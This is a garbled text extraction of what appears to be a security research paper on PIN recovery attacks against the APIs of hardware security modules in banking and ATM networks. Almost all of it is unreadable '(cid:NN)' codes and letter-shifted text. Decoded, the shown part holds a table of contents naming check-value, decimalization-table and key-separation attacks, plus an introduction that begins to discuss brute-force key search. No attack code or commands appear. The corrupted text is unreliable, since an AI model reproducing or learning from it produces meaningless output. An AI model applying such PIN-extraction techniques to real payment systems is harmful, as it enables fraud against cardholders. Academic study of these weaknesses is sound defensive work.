(cid:15)(cid:3))(cid:12)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:19) +L(cid:14)(cid:21) +(cid:25)(cid:17)(cid:27)(cid:17) 3,1(cid:3)5HFRYHU\(cid:3)DWWDFN(cid:3)ZLWK(cid:3)FRQVLVWHQF\(cid:3)FKHFNLQJ(cid:11)(cid:21)(cid:12)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:20) +(cid:25)(cid:17)(cid:27)(cid:17)(cid:20)(cid:17) 5HDOL]DWLRQ(cid:3)RI(cid:3)WKH(cid:3)RUDFOH(cid:3)J(cid:11)3 (cid:15)(cid:3))(cid:12)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:20) +L(cid:14)(cid:21) +(cid:26)(cid:17) 2WKHU(cid:3)$WWDFNV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:20) +(cid:26)(cid:17)(cid:20)(cid:17) 7KH(cid:3)&KHFN(cid:3)9DOXH(cid:3)$WWDFN(cid:3)$JDLQVW(cid:3)2IIVHWV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:20) +(cid:26)(cid:17)(cid:21)(cid:17) 7KH(cid:3)’HFLPDOL]DWLRQ(cid:3)’DWD(cid:3)$WWDFN(cid:3)DJDLQVW(cid:3)2IIVHWV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:21) +(cid:27)(cid:17) .H\(cid:3)6HSDUDWLRQ(cid:3)$WWDFNV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:22) +(cid:27)(cid:17)(cid:20)(cid:17) ([KDXVWLYH(cid:3) 3,1(cid:3) VHDUFK(cid:3) DQG(cid:3) &RGH(cid:3) %RRN(cid:3) $WWDFNV(cid:3) EDVHG(cid:3) RQ(cid:3) WKH(cid:3) IDLOXUH(cid:3) WR(cid:3) VHSDUDWH(cid:3) +3,1*(1(cid:18)3,19(5(cid:3)DQG(cid:3),3,1(1&(cid:18)23,1(1&(cid:3)NH\V(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:22) +(cid:27)(cid:17)(cid:21)(cid:17) ([KDXVWLYH(cid:3)3,1(cid:3)VHDUFK(cid:3)EDVHG(cid:3)RQ(cid:3)IDLOXUH(cid:3)WR(cid:3)VHSDUDWH(cid:3)EHWZHHQ(cid:3)3,19(5(cid:3)NH\V(cid:3)IRU(cid:3)GLIIHUHQW(cid:3) +YHULILFDWLRQ(cid:3)DOJRULWKPV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:23) +(cid:28)(cid:17) 5HIHUHQFHV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:25) +(cid:20)(cid:19)(cid:17) $SSHQGL[(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:26) +(cid:20)(cid:19)(cid:17)(cid:20)(cid:17) 3,1(cid:3)%ORFN(cid:3))RUPDWV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:26) +(cid:20)(cid:19)(cid:17)(cid:21)(cid:17) )XQFWLRQV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:27) +(cid:20)(cid:19)(cid:17)(cid:22)(cid:17) $OJRULWKPV(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:17)(cid:20)(cid:27) +(cid:20) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +(cid:20)(cid:17) ,QWURGXFWLRQ +7DPSHU(cid:3)UHVLVWDQW(cid:18)UHVSRQGLQJ(cid:3)VHFXULW\(cid:3)PRGXOHV(cid:3)(cid:11)7560(cid:12)(cid:3)IXOILOO(cid:3)DQ(cid:3)LPSRUWDQW(cid:3)UROH(cid:3)LQ(cid:3)ILQDQFLDO(cid:3)WUDQVDFWLRQ(cid:3) +QHWZRUNV(cid:3)E\(cid:3)SURYLGLQJ(cid:3)D(cid:3)VHFXUH(cid:3)WUXVWHG(cid:3)HQYLURQPHQW(cid:3)ZLWKLQ(cid:3)ZKLFK(cid:3)WR(cid:3)VWRUH(cid:3)DQG(cid:3)PDQLSXODWH(cid:3)VHQVLWLYH(cid:3) +GDWD(cid:17)(cid:3)(cid:3)7KH(cid:3)PRQHWDU\(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3)GDWD(cid:3)SURWHFWHG(cid:3)E\(cid:3)7560V(cid:3)LV(cid:3)LQGHHG(cid:3)VLJQLILFDQW(cid:15)(cid:3)UHSUHVHQWLQJ(cid:3)WKH(cid:3)VXP(cid:3) +RI(cid:3)EDQN(cid:15)(cid:3)GHELW(cid:3)DQG(cid:3)FUHGLW(cid:3)FDUG(cid:3)WUDQVDFWLRQV(cid:17) +0XFK(cid:3)ZRUN(cid:3)KDV(cid:3)EHHQ(cid:3)GRQH(cid:3)LQ(cid:3)HYDOXDWLQJ(cid:3)WKH(cid:3)VHFXULW\(cid:3)RI(cid:3)VXFK(cid:3)GHYLFHV(cid:3)IURP(cid:3)ERWK(cid:3)D(cid:3)SK\VLFDO(cid:3)UHVLVWDQFH(cid:3)WR(cid:3) +DWWDFN(cid:3)SHUVSHFWLYH(cid:3)DV(cid:3)ZHOO(cid:3)DV(cid:3)WKH(cid:3)ORJLFDO(cid:3)VHFXULW\(cid:3)IRU(cid:3)ZKLFK(cid:3)>(cid:20)@(cid:3)SURYLGHV(cid:3)D(cid:3)FRPSUHKHQVLYH(cid:3)LQWURGXFWLRQ(cid:3) +DQG(cid:3)RYHUYLHZ(cid:17)(cid:3)(cid:3),Q(cid:3)WKLV(cid:3)SDSHU(cid:15)(cid:3)ZH(cid:3)GHYHORS(cid:3)VHYHUDO(cid:3)$3,(cid:3)DWWDFNV(cid:3)(cid:11)DV(cid:3)LQ(cid:3)>(cid:21)@(cid:15)(cid:3)>(cid:22)@(cid:3)DQG(cid:3)>(cid:23)@(cid:12)(cid:3)EXW(cid:3)DJDLQVW(cid:3)WKH(cid:3) +VWDQGDUG(cid:3)3,1(cid:3)IXQFWLRQV(cid:3)WKDW(cid:3)DUH(cid:3)FRPPRQ(cid:3)WR(cid:3)$3,V(cid:3)XVHG(cid:3)LQ(cid:3)ILQDQFLDO(cid:3)WUDQVDFWLRQ(cid:3)QHWZRUNV(cid:3)(cid:11)RU(cid:3)$70(cid:3) +QHWZRUNV(cid:12)(cid:17)(cid:3)(cid:3)7KHVH(cid:3)3,1(cid:3)UHFRYHU\(cid:3)DWWDFNV(cid:3)DUH(cid:3)FRPSXWDWLRQ(cid:3)WULYLDO(cid:3)DQG(cid:3)H[WUHPHO\(cid:3)IDVW(cid:3)UHTXLULQJ(cid:3)RQO\(cid:3) +VHFRQGV(cid:3)WR(cid:3)VXFFHVVIXOO\(cid:3)H[WUDFW(cid:3)D(cid:3)3,1(cid:17) +:KLOH(cid:3)LW(cid:3)LV(cid:3)RXWVLGH(cid:3)RI(cid:3)WKH(cid:3)VFRSH(cid:3)RI(cid:3)WKLV(cid:3)SDSHU(cid:3)WR(cid:3)GHWDLO(cid:3)D(cid:3)¶VWDQGDUG(cid:3)3,1(cid:3)$3,•(cid:15)(cid:3)ZH(cid:3)SURYLGH(cid:3)D(cid:3)EULHI(cid:3) +RYHUYLHZ(cid:17)(cid:3)(cid:3)$(cid:3)UDZ(cid:3)3,1(cid:3)LV(cid:3)IRUPDWWHG(cid:3)LW(cid:3)LQWR(cid:3)RQH(cid:3)RI(cid:3)D(cid:3)QXPEHU(cid:3)RI(cid:3)SRVVLEOH(cid:3)3,1(cid:3)EORFN(cid:3)IRUPDWV(cid:15)(cid:3)ZKLFK(cid:3)LV(cid:3)WKHQ(cid:3) +HQFU\SWHG(cid:3)(cid:11)W\SLFDOO\(cid:3)XVLQJ(cid:3)(cid:22)’(6(cid:12)(cid:17)(cid:3)(cid:3)7KLV(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)LV(cid:3)VHQW(cid:3)IURP(cid:3)WKH(cid:3)RULJLQDWLQJ(cid:3)SRLQW(cid:15)(cid:3)DFURVV(cid:3) +D(cid:3)ILQDQFLDO(cid:3)QHWZRUN(cid:3)WR(cid:3)WKH(cid:3)DFFRXQW(cid:3)KROGHU•V(cid:3)LQVWLWXWLRQ(cid:15)(cid:3)WR(cid:3)EH(cid:3)YHULILHG(cid:17)(cid:3)(cid:3)(YHU\(cid:3)WZR(cid:3)FRQQHFWHG(cid:3)QRGHV(cid:3)RQ(cid:3) +WKH(cid:3)QHWZRUN(cid:15)(cid:3)VKDUH(cid:3)D(cid:3)XQLTXH(cid:3)NH\(cid:3)WKHUHE\(cid:3)HVWDEOLVKLQJ(cid:3)D(cid:3)VHFXUH(cid:3)]RQH(cid:3)EHWZHHQ(cid:3)WKH(cid:3)WZR(cid:3)SDUWLHV(cid:17)(cid:3)(cid:3):KHQ(cid:3)LW(cid:3) +LV(cid:3)¶VZLWFKHG•(cid:3)WKURXJK(cid:3)WKH(cid:3)QHWZRUN(cid:15)(cid:3)LW(cid:3)EHFRPHV(cid:3)QHFHVVDU\(cid:3)WR(cid:3)¶WUDQVODWH•(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)IURP(cid:3) +RQH(cid:3)]RQH(cid:3)NH\(cid:3)WR(cid:3)DQRWKHU(cid:17)(cid:3)(cid:3)$W(cid:3)WKH(cid:3)VDPH(cid:3)WLPH(cid:15)(cid:3)LW(cid:3)PD\(cid:3)EH(cid:3)UHTXLUHG(cid:3)WR(cid:3)¶UHIRUPDW•(cid:3)WKH(cid:3)3,1(cid:3)IURP(cid:3)WKH(cid:3)H[LVWLQJ(cid:3) +IRUPDW(cid:3)WR(cid:3)D(cid:3)QHZ(cid:3)RQH(cid:17)(cid:3)(cid:3)(cid:3)7KXV(cid:3)D(cid:3)VWDQGDUG(cid:3)3,1(cid:3)$3,(cid:15)(cid:3)ZLOO(cid:3)KDYH(cid:3)WKH(cid:3)DELOLW\(cid:3)WR(cid:3)YHULI\(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:15)(cid:3) +WUDQVODWH(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EHWZHHQ(cid:3)]RQH(cid:3)NH\V(cid:3)DQG(cid:3)WR(cid:3)UHIRUPDW(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:17)(cid:3)(cid:3),W(cid:3)REYLRXVO\(cid:3) +VXSSRUWV(cid:3) VRPH(cid:3) VHW(cid:3) RI(cid:3) 3,1(cid:3) IRUPDWV(cid:17)(cid:3) (cid:3) $(cid:3) PRUH(cid:3) FRPSUHKHQVLYH(cid:3) GLVFXVVLRQ(cid:3) LQFOXGLQJ(cid:3) GHWDLOV(cid:3) RI(cid:3) WKH(cid:3) +DOJRULWKPV(cid:3)LQYROYHG(cid:3)LV(cid:3)LQFOXGHG(cid:3)LQ(cid:3)WKH(cid:3)DSSHQGL[(cid:15)(cid:3)ZKLFK(cid:3)WKH(cid:3)UHDGHU(cid:3)LV(cid:3)HQFRXUDJHG(cid:3)WR(cid:3)FRQVXOW(cid:17)(cid:3)(cid:3)>(cid:24)@(cid:3)VHUYHV(cid:3) +DV(cid:3)D(cid:3)FRPSUHKHQVLYH(cid:3)UHIHUHQFH(cid:3)$3,(cid:17) +(cid:21)(cid:17) .QRZQ(cid:3)$WWDFNV(cid:3)DQG(cid:3)$VVXPHG(cid:3)/HYHO(cid:3)RI(cid:3)6HFXULW\ +7KH(cid:3)OHYHO(cid:3)RI(cid:3)VHFXULW\(cid:3)RIIHUHG(cid:3)E\(cid:3)DQ\(cid:3)FU\SWRJUDSKLF(cid:3)SURWHFWLRQ(cid:3)(cid:11)IXQFWLRQ(cid:12)(cid:3)LV(cid:3)PHDVXUHG(cid:3)E\(cid:3)WKH(cid:3)HIIRUW(cid:3) +UHTXLUHG(cid:3)WR(cid:3)GHIHDW(cid:3)LW(cid:17)(cid:3)(cid:3)7KXV(cid:15)(cid:3)ZH(cid:3)EULHIO\(cid:3)H[DPLQH(cid:3)WKH(cid:3)NQRZQ(cid:3)DWWDFNV(cid:3)DJDLQVW(cid:3)3,1(cid:3)WUDQVDFWLRQV(cid:3)WR(cid:3) +HVWDEOLVK(cid:3)WKH(cid:3)(cid:10)DVVXPHG(cid:10)(cid:3)OHYHO(cid:3)RI(cid:3)VHFXULW\(cid:17) +(cid:21)(cid:17)(cid:20)(cid:17) ([KDXVWLYH(cid:3).H\(cid:3)6HDUFK(cid:3)(cid:11)%UXWH(cid:3)IRUFH(cid:12) +([KDXVWLYH(cid:3)NH\(cid:3)VHDUFK(cid:3)LV(cid:3)(cid:11)DOPRVW(cid:12)(cid:3)DOZD\V(cid:3)D(cid:3)SRVVLELOLW\(cid:17)(cid:3),W(cid:3)LV(cid:3)DQ(cid:3)XQGHUVWRRG(cid:3)XSSHU(cid:3)ERXQG(cid:3)RQ(cid:3)WKH(cid:3)OHYHO(cid:3)RI(cid:3) +VHFXULW\(cid:3)WKDW(cid:3)FDQ(cid:3)EH(cid:3)DFKLHYHG(cid:3)(cid:16) DQG(cid:3)VR(cid:3)DQ\(cid:3)WHFKQLTXH(cid:3)WKDW(cid:3)GRHV(cid:3)QRW(cid:3)LPSURYH(cid:3)RQ(cid:3)LW(cid:3)LV(cid:3)RI(cid:3)OLWWOH(cid:3)LQWHUHVW(cid:17)(cid:3)(cid:3) +7KH(cid:3)VWUHQJWK(cid:3)RI(cid:3)D(cid:3)VHFXUH(cid:3)DOJRULWKP(cid:3)LV(cid:3)PHDVXUHG(cid:3)E\(cid:3)WKH(cid:3)OHQJWK(cid:3)RI(cid:3)WKH(cid:3)NH\(cid:3)(cid:11)HIIHFWLYHO\(cid:3)WKH(cid:3)VL]H(cid:3)RI(cid:3)WKH(cid:3) +NH\(cid:3)VSDFH(cid:3)UHTXLUHG(cid:3)WR(cid:3)EH(cid:3)VHDUFKHG(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)FXUUHQW(cid:3)VWDQGDUG(cid:3)3,1(cid:3)WUDQVDFWLRQ(cid:3)V\VWHPV(cid:3)DUH(cid:3)(cid:22)’(6(cid:3)(cid:11)UHI(cid:3) +9,6$(cid:3)UHTV(cid:12)(cid:3)(cid:16) 